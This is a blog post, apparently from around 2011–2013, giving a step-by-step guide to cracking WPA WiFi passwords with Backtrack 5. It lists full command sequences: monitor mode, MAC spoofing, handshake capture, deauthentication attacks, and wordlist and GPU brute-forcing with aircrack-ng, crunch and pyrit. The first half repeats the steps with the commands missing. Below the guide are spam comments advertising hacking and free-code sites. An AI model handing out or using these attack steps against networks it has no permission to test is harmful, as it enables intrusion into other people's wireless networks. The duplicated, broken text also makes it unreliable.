How to crack WiFi Password by Backtrack 5
STEPS TO HACK WIFI OR WIRELESS PASSWORD
1. Get the Backtrack-Linux CD. Backtrack Linux Live CD(best Linux available for hackers with more than 2000 hacking tools inbuilt).
Download Backtrack Linux Live CD from here: CLICK HERE
Steps to Follow:
Step 1 :
The result will be something like :
Step 2 :
Step 3 (Optional) :
Change the mac address of the mon0 interface.
Step 4 :
Then, press "
Step 5 :
*where -c is the channel
-w is the file to be written
--bssid is the BSSID
This terminal is keeping running.
Step 6 :
open another terminal.
*where -a is the BSSID
-c is the client MAC address (STATION)
Wait for the handshake.
Step 7 :
Use the John the Ripper as word list to crack the WPA/WP2 password.
Step 8 (Optional) :ITS AN OPTIONAL STEP,,,,,,
If you do not want to use John the Ripper as word list, you can use Crunch.
Go to the official site of crunch.
Download crunch 3.0 (the current version at the time of this writing).
*where
(B) nVidia Display Card with CUDA
If you have nVidia card that with CUDA, you can use pyrit to crack the password with crunch.
Step a :
The result will be something like :
Step b :
Step c (Optional) :
Change the mac address of the mon0 interface.
Step d :
Then, press "
Step e :
Step f :
open another terminal.
*where -a is the BSSID
-c is the client MAC address (STATION)
Wait for the handshake.
Step g :
If the following programs are not yet installed, please do it.
Step h :
Go to the official site of crunch.
Download
Step i :
Go to the official site of pyrit.
Download
Step j :
*where
Step k (Optional) :
If you encounter error when reading the
*where
Step l :
Then, you will see something similar to the following.
airmon-ng
The result will be something like :
Interface Chipset Driver
wlan0 Intel 5100 iwlagn - [phy0]
Step 2 :
airmon-ng start wlan0
Step 3 (Optional) :
Change the mac address of the mon0 interface.
ifconfig mon0 down
macchanger -m 00:11:22:33:44:55 mon0
ifconfig mon0 up
Step 4 :
airodump-ng mon0
Then, press "
Ctrl+c
" to break the program.Step 5 :
airodump-ng -c 3 -w wpacrack --bssid ff:ff:ff:ff:ff:ff --ivs mon0
*where -c is the channel
-w is the file to be written
--bssid is the BSSID
This terminal is keeping running.
Step 6 :
open another terminal.
aireplay-ng -0 1 -a ff:ff:ff:ff:ff:ff -c 99:88:77:66:55:44 mon0
*where -a is the BSSID
-c is the client MAC address (STATION)
Wait for the handshake.
Step 7 :
Use the John the Ripper as word list to crack the WPA/WP2 password.
aircrack-ng -w /pentest/passwords/john/password.lst wpacrack-01.ivs
Step 8 (Optional) :ITS AN OPTIONAL STEP,,,,,,
If you do not want to use John the Ripper as word list, you can use Crunch.
Go to the official site of crunch.
http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/
Download crunch 3.0 (the current version at the time of this writing).
http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/crunch-3.0.tgz/download
tar -xvzf crunch-3.0.tgz
cd crunch-3.0
make
make install
/pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | aircrack-ng wpacrack-01.ivs -b ff:ff:ff:ff:ff:ff -w -
*where
8 16
is the length of the password, i.e. from 8 characters to 16 characters.(B) nVidia Display Card with CUDA
If you have nVidia card that with CUDA, you can use pyrit to crack the password with crunch.
Step a :
airmon-ng
The result will be something like :
Interface Chipset Driver
wlan0 Intel 5100 iwlagn - [phy0]
Step b :
airmon-ng start wlan0
Step c (Optional) :
Change the mac address of the mon0 interface.
ifconfig mon0 down
macchanger -m 00:11:22:33:44:55 mon0
ifconfig mon0 up
Step d :
airodump-ng mon0
Then, press "
Ctrl+c
" to break the program.Step e :
airodump-ng -c 3 -w wpacrack --bssid ff:ff:ff:ff:ff:ff mon0
Step f :
open another terminal.
aireplay-ng -0 1 -a ff:ff:ff:ff:ff:ff -c 99:88:77:66:55:44 mon0
*where -a is the BSSID
-c is the client MAC address (STATION)
Wait for the handshake.
Step g :
If the following programs are not yet installed, please do it.
apt-get install libghc6-zlib-dev libssl-dev python-dev libpcap-dev python-scapy
Step h :
Go to the official site of crunch.
http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/
Download
crunch 3.0
(the current version at the time of this writing).http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/crunch-3.0.tgz/download
tar -xvzf crunch-3.0.tgz
cd crunch-3.0
make
make install
Step i :
Go to the official site of pyrit.
http://code.google.com/p/pyrit/downloads/list
Download
pyrit
and cpyrit-cuda
(the current version is 0.4.0 at the time of this writing).tar -xzvf pyrit-0.4.0.tar.gz
cd pyrit-0.4.0
python setup.py build
sudo python setup.py install
tar -xzvf cpyrit-cuda-0.4.0.tar.gz
cd cpyrit-cuda-0.4.0
python setup.py build
sudo python setup.py install
Step j :
/pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | pyrit --all-handshakes -r wpacrack-01.cap -b ff:ff:ff:ff:ff:ff -i - attack_passthrough
*where
8 16
is the length of the password, i.e. from 8 characters to 16 characters.Step k (Optional) :
If you encounter error when reading the
wpacrack-01.cap
, you should do the following step.pyrit -r wpacrack-01.cap -o new.cap stripLive
/pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | pyrit --all-handshakes -r new.cap -b ff:ff:ff:ff:ff:ff -i - attack_passthrough
*where
8 16
is the length of the password, i.e. from 8 characters to 16 characters.Step l :
Then, you will see something similar to the following.
Pyrit 0.4.0 (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+
Parsing file 'new.cap' (1/1)...
Parsed 71 packets (71 802.11-packets), got 55 AP(s)
Tried 17960898 PMKs so far; 17504 PMKs per second.
Right here is the right blog for everyone who wishes to find out about this topic.
ReplyDeleteYou know so much its almost tough to argue with you (not that I actually will need to…HaHa).
You definitely put a fresh spin on a topic which has been written about for a
long time. Excellent stuff, just great!
Also visit my site Twitter Hack
Here is my weblog ; download advanced password recovery
Nice post. I learn something new and challenging on sites I
ReplyDeletestumbleupon on a daily basis. It's always helpful to read through content from other authors and use a little something from other sites.
My page: wifi password hack
There are countless local walks, runs, marathons, etc.
ReplyDeleteThis doesn't mean drinking vast amounts of water just prior to a workout, but sustained daily hydration. In return for trainer's competence, you should
be a great client by pushing yourself without whining,
being punctual, friendly, and above all ' showing up at the gym even when you don't feel like it' or even when it's raining.
Here is my site - tap the hinh nam
Adding weight training to your regular gym routine or home workouts will improve your performance in all other exercises.
ReplyDeleteThis doesn't mean drinking vast amounts of water just prior to a workout, but sustained daily hydration. You can use videos, books (there is even a Pole Dancing for Dummies book on the activity, students can take classes online, or they can go to the nearest pole dancing studio.
Stop by my weblog ... deedrambo.deengames.com
Hi, after reading this amazing paragraph i am also glad to share my know-how here with colleagues.
ReplyDeleteMy web page ... mail sender
Website: Thеse days people live very busy livеs so they use the conνenіence of customerѕ while businesѕ ԁeciding on the
ReplyDeletegym timings. Store yοur еxрreѕseԁ milk іn milk ѕtoгage bags and kеep the fаcilitу offline for up to thгee catеgоries, and hours of оnlinе
traіning ρrovided for its members.
Shaved ice came about becausе not businеѕs eveгyone сan afford, or ωаnts tо pay, just takе out уour
ωallet to your car to your TV to yоur phone.
It does a body goοԁ.
Hеre is my blog ... internet marketing books
Nοwadays search engіnе top ranκіng involves a hell of alot more.
ReplyDeleteThe right strategies have to be vеry pагticular about giving your ρroject to a search enginе
top ranking company, you can anticipate thаt coѕtѕ will range frоm $1, 000 to $5,
000 to 25, 000 worԁs per day. This particulаг
effort would sаѵe you from ωorries
and the losses that you will reсeive fοr
your efforts.
Alѕo visit my web-site - wekokypoduz.sosblogs.com
But there are other ways a student of English can learn the language online.
ReplyDeleteHere are the top rated Spanish translation i - Phone
apps available on the App Store right now.
According to time you will observe, after doing exercises from
various websites you grammatical skill has developed a lot.
my blog post cach hoc tieng anh
It used to be that the Philippines' biggest competitive advantage in the global job market is the proficiency of our skilled workers in the English language. The only problem why we lack in communication skills as far as English language is concerned is that the pupils starting with kindergarten are not trained well by their teachers as regards the macro-skills in teaching a particular language. The educational system in Saudi Arabia is an issue only discussed and decided by its royal rulers.
ReplyDeleteLook at my web site; cach hoc tieng anh
Hello, Neat post. There's a problem with your web site in web explorer, would test this? IE still is the market chief and a big component of other folks will pass over your wonderful writing due to this problem.
ReplyDeleteCheck out my blog post; convert virtapay
all the time i used to read smaller articles or reviews that also
ReplyDeleteclear their motive, and that is also happening with this article which I am
reading at this place.
Feel free to surf to my web page :: free psn codes 2013
I really like what you guys are usually up too.
ReplyDeleteSuch clever work and coverage! Keep up the superb works guys I've you guys to our blogroll.
my web site ... free psn code